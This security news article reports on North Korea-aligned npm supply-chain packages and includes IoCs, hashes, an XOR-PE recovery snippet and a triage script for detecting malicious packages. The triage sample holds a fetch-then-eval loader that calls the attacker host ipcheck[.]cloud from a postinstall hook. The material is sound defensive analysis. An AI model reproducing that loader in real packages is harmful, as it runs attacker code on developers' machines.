Attackers often target npm packages to inject malicious code into widely used libraries, giving them reach into a massive base of developers and applications.
Through such compromises, threat actors can steal sensitive information such as source code and configuration files, and then deploy further malware.
Phylum researchers recently discovered that North Korean state-aligned hackers are actively targeting developers via malicious npm packages.
Technical Analysis
North Korea-aligned threat actors have renewed their malicious campaign on npm, publishing multiple packages since August 12, 2024, including:
- temp-etherscan-api
- ethersscan-api
- telegram-con
- qq-console
This campaign, linked to the "Contagious Interview" operation, uses multi-layered obfuscated JavaScript that retrieves additional malware components from the internet.
Among other things, it uses Python scripts, and even a fully working copy of the Python interpreter, to hunt for browser extensions of cryptocurrency wallets, continuously searching them and stealing their sensitive contents.
A separate package, helmet-validate, uses a different code-inclusion method: the loader is embedded in config.js and uses the eval() construct to execute JavaScript fetched from a remote host.
Such attacks show how the group's Tactics, Techniques, and Procedures (TTPs) continue to evolve, posing a serious threat to the developer community.
Advanced Persistent Threat groups linked to North Korea, such as "Moonstone Sleet", are also known to be carrying out advanced supply chain attacks on the npm ecosystem.
Their methods include typosquatted packages such as sass-notification that carry heavily obfuscated JavaScript payloads.
The malicious scripts use eval() to fetch and execute code from attacker-controlled domains such as ipcheck[.]cloud and mirotalk[.]net (both resolving to 167[.]88[.]36[.]13).
Besides this, the attack chain typically involves multi-stage execution, starting with batch scripts that spawn PowerShell processes.
The PowerShell stage downloads XOR-encrypted payloads, decrypts them, loads them as DLLs through reflection, and applies anti-forensic techniques to eliminate the artifacts left behind.
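As an added example (not code from the campaign or from the researchers), the Node.js snippet below shows the analyst-side counterpart of that PowerShell step: recovering an XOR-encrypted DLL from a captured download when the key is unknown, by brute-forcing a single-byte key and validating the candidate against the PE header layout (the "MZ" signature and the "PE\0\0" signature at the offset stored at 0x3C). The single-byte-key assumption and the minimal fake PE buffer are constructed for illustration; real stages may use longer keys, which the same xorDecode() handles once the key is known.

```javascript
// Added example: recover an XOR-encrypted PE stage from a captured payload.
// Not the actors' code; the sample "encrypted payload" is constructed below.

const MZ = Buffer.from('MZ');
const PE_SIG = Buffer.from([0x50, 0x45, 0x00, 0x00]); // "PE\0\0"

// XOR a buffer with a repeating key (single byte or multi-byte). XOR is symmetric,
// so the same function encrypts and decrypts.
function xorDecode(buf, key) {
  const k = Buffer.isBuffer(key) ? key : Buffer.from([key & 0xff]);
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ k[i % k.length];
  return out;
}

// A PE file starts with "MZ" and has "PE\0\0" at the little-endian uint32 offset stored at 0x3C.
function looksLikePE(buf) {
  if (buf.length < 0x40 || !buf.subarray(0, 2).equals(MZ)) return false;
  const eLfanew = buf.readUInt32LE(0x3c);
  if (eLfanew + 4 > buf.length) return false;
  return buf.subarray(eLfanew, eLfanew + 4).equals(PE_SIG);
}

// Try every single-byte key; return { key, plain } for the first one that yields a PE, else null.
function bruteForceXorPE(enc) {
  if (enc.length < 0x40) return null;
  for (let key = 0; key < 256; key++) {
    // Cheap prefilter: only decode fully if the first two bytes become "MZ".
    if ((enc[0] ^ key) !== 0x4d || (enc[1] ^ key) !== 0x5a) continue;
    const plain = xorDecode(enc, key);
    if (looksLikePE(plain)) return { key, plain };
  }
  return null;
}

// Constructed sample: a 0x80-byte buffer with a DOS header and the PE signature at 0x40.
function buildFakePE() {
  const pe = Buffer.alloc(0x80, 0x00);
  MZ.copy(pe, 0);
  pe.writeUInt32LE(0x40, 0x3c);
  PE_SIG.copy(pe, 0x40);
  pe.write('fake-dll-stage', 0x50);
  return pe;
}

const SAMPLE_KEY = 0x5a;                                  // assumed key for the sample
const SAMPLE_ENC = xorDecode(buildFakePE(), SAMPLE_KEY);  // what an analyst would capture on the wire

const recovered = bruteForceXorPE(SAMPLE_ENC);
console.log(recovered ? `key=0x${recovered.key.toString(16)} looksLikePE=${looksLikePE(recovered.plain)}` : 'no key found');
```

In practice the captured blob comes from a proxy log or the PowerShell process's network capture; once the key is recovered, the decoded DLL can be hashed and submitted to the usual sandbox pipeline, which is exactly the artifact the reflective-load step was meant to keep off disk.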
The actors also abuse the scripts field of package.json (lifecycle hooks such as preinstall and postinstall) so that their code runs automatically on npm install or during the build process.
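As an added example (not Phylum's tooling or the actors' code), here is a small Node.js triage script covering the three patterns described above: lifecycle hooks in package.json, an eval()-based remote loader like the one reported for helmet-validate and sass-notification, and references to the listed IoC hosts. The sample package.json and source files are constructed to resemble, not reproduce, the reported packages.

```javascript
// Added example (not Phylum's tooling or the actors' code): static triage of an
// unpacked npm package for the install-hook and remote-eval patterns in the article.

// npm lifecycle hooks that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preprepare', 'postprepare'];

// Network IoCs from the article, un-defanged for matching.
const IOC_HOSTS = ['ipcheck.cloud', 'mirotalk.net', '45.61.158.14', '167.88.36.13', '95.164.17.24'];

// "fetch something remote" plus "execute a string as code" is the loader pattern.
const REMOTE_FETCH = /\b(https?\.(get|request)|fetch|axios(\.\w+)?)\s*\(/;
const DYNAMIC_EVAL = /\b(eval|new\s+Function)\s*\(/;
// Long base64/hex string literals are a cheap obfuscation signal.
const ENCODED_BLOB = /['"`][A-Za-z0-9+\/=]{200,}['"`]/;

function triageManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'lifecycle-hook', hook, command: scripts[hook] });
  }
  return findings;
}

function triageSource(file, src) {
  const findings = [];
  const text = src.replace(/\[\.\]/g, '.'); // normalise defanged hosts before matching
  for (const host of IOC_HOSTS) {
    if (text.includes(host)) findings.push({ kind: 'ioc-host', file, host });
  }
  if (DYNAMIC_EVAL.test(src) && REMOTE_FETCH.test(src)) findings.push({ kind: 'remote-eval-loader', file });
  const blob = src.match(ENCODED_BLOB);
  if (blob) findings.push({ kind: 'encoded-blob', file, length: blob[0].length - 2 });
  return findings;
}

// pkg: parsed package.json; files: { relativePath: sourceText } for the unpacked tarball.
function triagePackage(pkg, files) {
  return Object.entries(files).reduce(
    (acc, [file, src]) => acc.concat(triageSource(file, src)),
    triageManifest(pkg));
}

// Constructed sample: a postinstall hook runs config.js, which fetches and eval()s remote code.
const SAMPLE_PKG = { name: 'example-validate', version: '0.0.1', scripts: { postinstall: 'node config.js' } };
const SAMPLE_FILES = {
  'config.js': `const https = require('https');
https.get('https://ipcheck[.]cloud/check', r => { let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d)); });`,
  'lib.js': "const p = '" + 'A'.repeat(240) + "'; module.exports = p;",
  'index.js': 'module.exports = (x) => typeof x === "string";',
};

const SAMPLE_FINDINGS = triagePackage(SAMPLE_PKG, SAMPLE_FILES);
console.log(JSON.stringify(SAMPLE_FINDINGS, null, 2));
```

Any one finding is weak on its own (many legitimate packages have a postinstall, and eval() alone is just bad style); the combination of an install hook with a fetch-then-eval loader, or with a listed IoC host, is what should block the package in a CI gate.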
This campaign highlights clear advancements in North Korean operations: the techniques used to hide code, evade detection and maintain persistence are designed to defeat static analysis and endpoint protection.
IoCs
ipcheck[.]cloud
45[.]61[.]158[.]14
167[.]88[.]36[.]13
95[.]164[.]17[.]24
Package Name | Version | Package Tarball Sha256 |
---|---|---|
ethersscan-api | 0.0.1 | d4f3113e1e0384bcf37c39678deb196fb5b39f15c4990134b6b8637be74e5a2e |
ethersscan-api | 0.0.2 | f1f3002dec6e36e692e087626edd9b6b0f95a176c0c204d4703ccb4f425aa317 |
ethersscan-api | 0.0.3 | 5e5313aaf281c8a8eed29ba2c1aaa5aa65bc174bcd0be466f4533712599db758 |
helmet-validate | 0.0.1 | 2a00838ccd08b26c7948d1dd25c33a114dd81c3bcee3de595783e6f396e7f50e |
qq-console | 0.0.1 | aec21b53ee4ae0b55f5018fc5aaa5a4f095a239a64272ca42047c40ec3c212c0 |
sass-notification | 1.0.0 | f7c142178605102ee56f7e486ba68b97f3f6b522994b24f4116dbbd2abc28cec |
telegram-con | 0.0.1 | 0110318f70072171c0edc624c8e8be38892f984b121d6a5a5ced1f6b0b45dbd0 |
temp-etherscan-api | 0.0.1 | 94da263d603bf735ab85f829b564261e59a1d13915d21babe58e72435bfe32ab |